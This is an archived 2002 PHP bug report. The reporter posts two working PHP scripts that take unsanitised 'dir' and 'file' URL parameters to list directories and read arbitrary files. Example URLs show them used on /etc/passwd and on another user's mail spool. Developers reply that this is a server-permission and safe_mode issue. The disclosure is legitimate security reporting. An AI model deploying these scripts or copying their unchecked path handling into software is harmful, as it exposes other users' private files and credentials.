php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #15185 Exploring the server recources witch php
Submitted: 2002-01-23 14:26 UTC Modified: 2002-05-03 00:00 UTC
From: koval at kocham dot cie dot gov dot pl Assigned:
Status: No Feedback Package: *Directory/Filesystem functions
PHP Version: 4.0.6 OS: Slackware
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2002-01-23 14:26 UTC] koval at kocham dot cie dot gov dot pl
I've found a possible bug in php 4.06. using simple function readdir(); I coul explore about 90 % of server including /var/spool/mail /ect/passwd e.t.c.

I've wrote simple script that let me to move through all directories:

<?
if ($dir=="")
{
	$dir=".";
}
function getDirList ($dirName) {
print("<h1>Index of: $dirName</h1><hr>");
$dirs=array();
$files=array();
$dirfiles=array();
$dirn=0;
$filen=0;
		$d = dir($dirName);
		while($entry = $d->read()) {
			if ($entry != "." && $entry != "..")
			{
				if (is_dir($dirName."/".$entry))
				{
					array_push($dirs, "$dirName/$entry");
					$dirn++;
				}
				else
				{
					array_push($files, "$entry");
					array_push($dirfiles, "$dirName");
					$filen++;
				}
			}
		}
		$d->close();
$tmp=0;
while ($tmp<$dirn)
{
	print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>");
	$tmp++;
}
$tmp=0;
while ($tmp<$filen)
{
	print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>");
	$tmp++;
}
if ($dirName!=".")
{
	print("<hr><button OnClick='javascript:history.back();'>Back");
}
}
getDirList("$dir");
?>

Default directory is '.' (Your home directory), but if you load this page with parameter dir=/ ( ex. http://your.host/dir.php?dir=/ ) You will probably access main folder on your unix server.
I wrote second script that let me read the files not in my home directory:

<?
function readtxt ($path)
{
$Plik=fopen($path, "r");
flock($Plik, 1);
$rozm=filesize("$path");
$flaga=0;
while($flaga<$rozm)
{
  $Linia = fgets($Plik, 2);
	print("$Linia");    
    if ($Linia=="\n")
    {
	print("<br>");
    }
    $flaga++;
}
flock($Plik, 3);
fclose($Plik);
}
readtxt ($file);
?>

By typing, for example http://your.host/readtxt.php?file=/var/spool/mail/disco_dzik i could read disco_dzik's mail.

Simple, but serious...

Both of scripts wold not move You outside your home directory if the server would be two machines (first one for system, and the second one just fore home directories) - it's obvious, but I've checked it ;)

P.S.
Scripts were wroten for my use only, so some of the variables are named in polish - sorry for that ;)
This is a serious bug that needs to be fixed !

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-01-23 14:54 UTC] hholzgra@php.net
not a php issue

php runs with the same permissions as the user
the webserver runs under, so if this user has
permission to see the whole server filesystem
php will have that, too

run your wesserver as a low-privileged user
and give it read permission to the absolute
minimum of the filesystem 

or have a look at 
http://www.php.net/manual/en/features.safe-mode.php
 [2002-01-23 16:52 UTC] daniel@php.net
Actually this is a dupe of MY bug report. PHP has a bug with readdir(). safe_mode does not limit readdir:

  http://bugs.php.net/bug.php?id=15018&edit=1

someone bogusified it. Wasn't me. And yes, I tested it on 4.1.0.

Kind Regards,
  Daniel Lorch
 [2002-01-23 17:13 UTC] rasmus@php.net
Daniel, please stop saying readdir() here.  readdir() should not have any safe-mode checks anymore than fgets() should.  It simply makes no sense.  opendir() is where the safe-mode check should be applied.
 [2002-04-02 13:49 UTC] sander@php.net
I'm pretty sure this has been fixed now. Can you try 4.2.0RC1 from www.php.net/~derick ?
 [2002-05-03 00:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a month, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Sun Sep 19 13:03:37 2021 UTC